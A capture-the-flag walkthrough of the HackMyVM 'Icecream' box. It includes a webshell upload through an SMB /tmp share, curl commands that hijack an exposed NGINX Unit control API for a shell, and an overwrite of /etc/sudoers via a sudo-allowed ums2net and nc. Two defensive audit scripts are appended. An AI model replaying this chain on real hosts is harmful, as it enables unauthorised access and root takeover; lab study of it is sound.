HMV Icecream
Todd

Information Gathering

Service Detection

IP=192.168.0.191
nmap -sV -sC -T4 -Pn -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 03:04 EDT
Nmap scan report for 192.168.0.191
Host is up (0.00016s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
|_ 256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.22.1
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
9000/tcp open cslistener?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 07:04:45 GMT
| Content-Type: application/json
| Content-Length: 40
| Connection: close
| "error": "Value doesn't exist."
| GetRequest:
| HTTP/1.1 200 OK
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 07:04:45 GMT
| Content-Type: application/json
| Content-Length: 1042
| Connection: close
| "certificates": {},
| "js_modules": {},
| "config": {
| "listeners": {},
| "routes": [],
| "applications": {}
| "status": {
| "modules": {
| "python": {
| "version": "3.11.2",
| "lib": "/usr/lib/unit/modules/python3.11.unit.so"
| "php": {
| "version": "8.2.18",
| "lib": "/usr/lib/unit/modules/php.unit.so"
| "perl": {
| "version": "5.36.0",
| "lib": "/usr/lib/unit/modules/perl.unit.so"
| "ruby": {
| "version": "3.1.2",
| "lib": "/usr/lib/unit/modules/ruby.unit.so"
| "java": {
| "version": "17.0.11",
| "lib": "/usr/lib/unit/modules/java17.unit.so"
| "wasm": {
| "version": "0.1",
| "lib": "/usr/lib/unit/modules/wasm.unit.so"
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 07:04:45 GMT
| Content-Type: application/json
| Content-Length: 35
| Connection: close
|_ "error": "Invalid method."
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:EA:54:0F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -7s
| smb2-time:
| date: 2024-10-09T07:04:45
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds

Web Service

First, a directory scan on port 80:

gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -x php,txt,html,zip

Nothing found.
Now let's see what port 9000 is.

gobuster dir -u http://$IP:9000 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -x php,txt,html,zip

/config (Status: 200) [Size: 62]
/status (Status: 200) [Size: 862]
/certificates (Status: 200) [Size: 4]

Looking back at the nmap output above, the returned JSON looks a lot like these directory names, and I noticed

"connections": {
"accepted": 0,
"active": 0,
"idle": 0,
"closed": 0
},

this section, so I guessed the service is a status monitor for a web server. The response header says Unit/1.33.0; a quick search shows it is an application runtime from Nginx. It sounds like something comparable to Apache's mod_php: nginx itself never shipped a PHP interpreter and had to rely on the third-party php-fpm, and Unit appears to fill exactly that role.

"modules": {
"python": {
"version": "3.11.2",
"lib": "/usr/lib/unit/modules/python3.11.unit.so"
},
"php": {
"version": "8.2.18",
"lib": "/usr/lib/unit/modules/php.unit.so"
},
"perl": {
"version": "5.36.0",
"lib": "/usr/lib/unit/modules/perl.unit.so"
},
"ruby": {
"version": "3.1.2",
"lib": "/usr/lib/unit/modules/ruby.unit.so"
},
"java": {
"version": "17.0.11",
"lib": "/usr/lib/unit/modules/java17.unit.so"
},
"wasm": {
"version": "0.1",
"lib": "/usr/lib/unit/modules/wasm.unit.so"
},
"wasm-wasi-component": {
"version": "0.1",
"lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
}
},

SMB Service

smbclient -L //$IP

Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
icecream Disk tmp Folder
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.0.191 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

Logging in with icecream

smbclient //$IP/icecream -U icecream

systemd-private-316958a127774e8999c7e14213a3bf9d-systemd-logind.service-GSf4CG D 0 Wed Oct 9 03:03:41 2024
systemd-private-316958a127774e8999c7e14213a3bf9d-systemd-timesyncd.service-MPGNuI D 0 Wed Oct 9 03:03:40 2024
# Looks like this share is /tmp
smb: \> put 1.php

The webshell is uploaded. Start a local listener:

pwncat -l -p 1234

Then I requested 1.php on port 80 and, sure enough, got the webshell.

(remote) www-data@icecream:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
ice:x:1000:1000:ice,,,:/home/ice:/bin/bash
unit:x:999:995:unit user:/nonexistent:/bin/false

Next comes privilege escalation.

Privilege Escalation to ice

I looked through the web directory and found nothing, and www-data has no sudo -l entries either, so I went straight to pspy64.

First, there are no cron jobs. Then I remembered that port 9000 had not been used yet, and that this process exists:

2024/10/09 11:26:31 CMD: UID=0     PID=486    | unit: main v1.33.0 [/usr/sbin/unitd --control 0.0.0.0:9000 --user ice]

Since it runs as the ice user, this is most likely the entry point. I was not familiar with Unit, so I read the official Unit documentation
and found that its control API can configure Unit, even creating a PHP application. The official examples all use curl with --unix-socket locally, but here the control API is reachable directly on port 9000.

Thinking about it, anyone familiar with Unit could have escalated directly through port 9000, without first getting www-data at all.

After some research, I put together these curl commands:

curl -X PUT -d '{"app":{"type":"php","root":"/tmp","script":"2.php"}}' http://192.168.0.191:9000/config/applications

curl -X PUT -d '[{"action":{"share":"/tmp/2.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.0.191:9000/config/routes

curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.0.191:9000/config/listeners

They add a PHP application, a route and a listener, respectively. After that the application is reachable on port 8888.
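The exposure this chain depends on can be checked from the defender's side. The following audit script is an added example written for this writeup, not part of the original post or of Unit: it takes the unitd command line as seen in pspy and the JSON returned by the control API's /config endpoint, and reports a control API bound on a network address, apps running as a non-service account, and any listener, route share or application root that sits in a world-writable directory. The sample command line and config are constructed to match what the three curl commands above create on this box.

```python
"""Audit an NGINX Unit instance from its unitd command line and /config JSON."""
import json
import re

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")  # any local user can plant code here
LOOPBACK = ("127.0.0.1", "::1", "localhost")

def control_api_findings(cmdline: str) -> list:
    """Flag a unitd control endpoint reachable over TCP and a non-service --user."""
    findings = []
    m = re.search(r"--control\s+(\S+)", cmdline)
    if m and not m.group(1).startswith("unix:"):
        host = m.group(1).rsplit(":", 1)[0].strip("[]")
        if host not in LOOPBACK:
            findings.append(f"control API on {m.group(1)} is reachable from the network, unauthenticated")
    u = re.search(r"--user\s+(\S+)", cmdline)
    if u and u.group(1) not in ("unit", "nobody"):
        findings.append(f"apps run as '{u.group(1)}' rather than a dedicated service account")
    return findings

def config_findings(config: dict) -> list:
    """Flag listeners, route shares and app roots in /config that widen exposure."""
    findings = []
    for listener in config.get("listeners", {}):
        if listener.startswith(("*:", "0.0.0.0:", "[::]:")):
            findings.append(f"listener {listener} is bound on all interfaces")
    routes = config.get("routes", [])
    if isinstance(routes, dict):  # named route sets: {"name": [step, ...]}
        routes = [step for steps in routes.values() for step in steps]
    for step in routes:
        shares = step.get("action", {}).get("share", [])
        for share in (shares if isinstance(shares, list) else [shares]):
            if share.startswith(WORLD_WRITABLE):
                findings.append(f"route serves files from world-writable {share}")
    for name, app in config.get("applications", {}).items():
        root = app.get("root", "")
        if root.startswith(WORLD_WRITABLE):
            findings.append(f"application '{name}' ({app.get('type')}) is rooted in world-writable {root}")
    return findings

# Constructed sample mirroring this box: the pspy process line and the
# listener/route/application created by the three curl commands.
SAMPLE_CMDLINE = "/usr/sbin/unitd --control 0.0.0.0:9000 --user ice"
SAMPLE_CONFIG = json.loads('{"listeners": {"*:8888": {"pass": "routes"}}, '
    '"routes": [{"action": {"share": "/tmp/2.php$uri", "fallback": {"pass": "applications/app"}}}], '
    '"applications": {"app": {"type": "php", "root": "/tmp", "script": "2.php"}}}')

def audit(cmdline: str = SAMPLE_CMDLINE, config: dict = SAMPLE_CONFIG) -> list:
    return control_api_findings(cmdline) + config_findings(config)
```

On a real host, feed it `ps -o args= -C unitd` and `curl --unix-socket /var/run/control.unit.sock http://localhost/config`; an empty list means nothing was flagged.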

# Local listener on the port used in 2.php
pwncat -l -p 8889

Requesting http://192.168.0.191:8888/2.php gives a shell as ice.

(remote) ice@icecream:/$ id
uid=1000(ice) gid=1000(ice) grupos=1000(ice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth)

(remote) ice@icecream:/home/ice$ sudo -l;
Matching Defaults entries for ice on icecream:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ice may run the following commands on icecream:
(ALL) NOPASSWD: /usr/sbin/ums2net

Privilege Escalation to root

Running man ums2net shows it is a USB Mass Storage to Network tool: it exposes a USB device over TCP so that you can write to the device with nc.
From the project's GitHub page:

How to use ums2net

  1. Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path
    for that device.
  2. Create a config file base on the above path. Please see the config file
    format section.
  3. Run "ums2net -c". ums2net will become a daemon in the
    background. For debugging please add "-d" option to avoid detach.
  4. Use nc to write your image to the USB Mass Storage device. For example,
    “nc -N localhost 29543 < warp7.img”

Config file

Each line in the config file maps a TCP port to a device. All the options are
separated by space. The first argument is a number representing the TCP port.
The rest of the arguments are in dd-style. For example,

A line in the config file:

"29543 of=/dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096"

It means TCP port 29543 is mapped to /dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 and the block size is 4096.

Currently we only support “of” and “bs”.

That sounds like a TCP version of dd. Since it runs as root and can write, my first thought was to write authorized_keys and then log in over ssh.

echo "8889 of=/root/.ssh/authorized_keys bs=4096" > config
sudo /usr/sbin/ums2net -c config -d

Then connect with nc from the attacking machine:

nc -N  $IP 8889 < ~/.ssh/id_rsa.pub

It errored out:

ums2net[14352]: Device /root/.ssh/authorized_keys not appeared. Close immediately.

Apparently the file does not exist. In the end, with a hint from ll104567, I escalated by writing to the sudoers file instead.

echo "8889 of=/etc/sudoers" > config
sudo /usr/sbin/ums2net -c config -d

Then connect with nc from the attacking machine:

echo 'ice ALL=(ALL) NOPASSWD: ALL'|nc $IP 8889

Running sudo -l again shows the new entry, as expected.

sudo su -
root@icecream:~# pwd
/root

Although the newline written into the sudoers file produced a parse error, root was obtained successfully.
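The root of this escalation is that the sudo rule lets ice run ums2net with any -c config, and ums2net's "of=" accepts any path, not only a disk. As an added example written for this writeup (not ums2net's own code), the validator below implements the README's line format, "port of=path [bs=n]", and reports any target that is not a device path under /dev/disk/by-id/, which is the check a wrapper or restricted sudo rule would need in order to refuse the sudoers write shown above. The sample config lines are constructed.

```python
"""Validate ums2net config lines: '<port> of=<path> [bs=<n>]' per the README."""
import os

DEVICE_DIR = "/dev/disk/by-id/"

def parse_line(line: str) -> dict:
    """Parse one config line; raise ValueError on anything outside the format."""
    fields = line.strip().strip('"').split()
    if len(fields) < 2 or not fields[0].isdigit():
        raise ValueError(f"expected '<port> of=... [bs=...]', got {line!r}")
    port = int(fields[0])
    if not 1 <= port <= 65535:
        raise ValueError(f"TCP port out of range: {port}")
    entry = {"port": port, "of": None, "bs": None}  # bs stays None when absent
    for opt in fields[1:]:
        key, sep, val = opt.partition("=")
        if sep and key == "of" and val:
            entry["of"] = val
        elif sep and key == "bs" and val.isdigit() and int(val) > 0:
            entry["bs"] = int(val)
        else:
            raise ValueError(f"unsupported option (README allows only of= and bs=): {opt}")
    if entry["of"] is None:
        raise ValueError("missing of=")
    return entry

def check_entry(entry: dict) -> list:
    """Reasons a wrapper or sudo policy should refuse this entry (empty = OK)."""
    target = os.path.normpath(entry["of"])  # collapses ../ so the prefix check holds
    reasons = []
    if not target.startswith(DEVICE_DIR):
        reasons.append(f"of={entry['of']} is not a {DEVICE_DIR} device path")
    if target != entry["of"]:
        reasons.append("of= contains '..' or redundant separators")
    return reasons

# Constructed sample: the README's device line, the write used on this box,
# and a traversal variant that the normpath check must also catch.
SAMPLE_CONFIG = """\
29543 of=/dev/disk/by-id/usb-Linux_UMS_disk_0_WaRP7-0x2c98b953000003b5-0:0 bs=4096
8889 of=/etc/sudoers
8890 of=/dev/disk/by-id/../../etc/sudoers bs=512
"""

def audit_config(text: str = SAMPLE_CONFIG) -> list:
    """Return (port, target, reasons) for each non-comment line."""
    results = []
    for line in text.splitlines():
        if line.strip() and not line.lstrip().startswith("#"):
            entry = parse_line(line)
            results.append((entry["port"], entry["of"], check_entry(entry)))
    return results
```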

Done. 🎉
